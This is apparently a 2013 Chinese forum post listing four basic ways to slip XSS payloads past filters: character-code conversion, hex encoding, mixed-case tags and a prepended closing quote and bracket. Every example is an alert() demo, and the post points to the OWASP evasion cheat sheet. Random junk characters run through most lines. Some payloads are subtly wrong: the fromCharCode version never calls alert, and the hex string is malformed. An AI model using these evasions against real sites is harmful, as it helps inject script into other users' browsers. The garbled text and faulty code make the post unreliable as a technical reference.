四种超级基础的绕过方法。, _+ Z% V& x6 R% i+ p! ~: b K( v
1.转换为ASCII码, `7 P( {$ m. T3 ]
例子:原脚本为<script>alert(‘I love F4ck’)</script >
9 E& i, J& N5 v通过转换,变成:0 z6 @# X0 J+ D
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41) </script>
" x! X2 f% r- S9 x" o( B
, y, n# z6 n7 {5 W2.转换为HEX(十六进制)8 [ d3 x5 }# X
例子:原脚本为<script>alert(‘I love F4ck’)</script>1 L7 w5 C$ U% I& t9 m& q: M6 ?
通过转换,变成:
# h& {1 V) D- u4 G: k/ `1 l%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e! S/ f8 P' }, e. G& ^
! z" b" Q: H# D: j/ i" T" }4 S' f
3.转换脚本的大小写
1 @# ~3 }+ y2 P( w7 w例子:原脚本为<script>alert(‘I love F4ck’)</script>
! g3 Y4 c3 O7 ?) p5 U5 L转换为:<ScRipt>AleRt(‘I love F4ck’)</sCRipT>
3 n: n" R3 M- Z9 U 3 p5 U( X$ ]9 T: h4 K
4.增加闭合标记”>
2 Y7 O! s0 D" W例子:原脚本为<script>alert(‘I love F4ck’)</script>+ a8 e2 b" t( a( @
转换为:”><script>alert(‘I love F4ck’)</script>
1 |: D' M; k/ j! L* f- F更详细绕过技术请参考此网页
+ a. t. ^, }" w6 o0 nhttps://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet6 h% ?/ U5 U( A, R) N
% p3 k& C5 L# v/ g# P" [) O: B) x. [9 \转换工具使用的是火狐的 hackbar mozilla addon. |
发表于 2013-2-14 00:10:39
收藏
支持
反对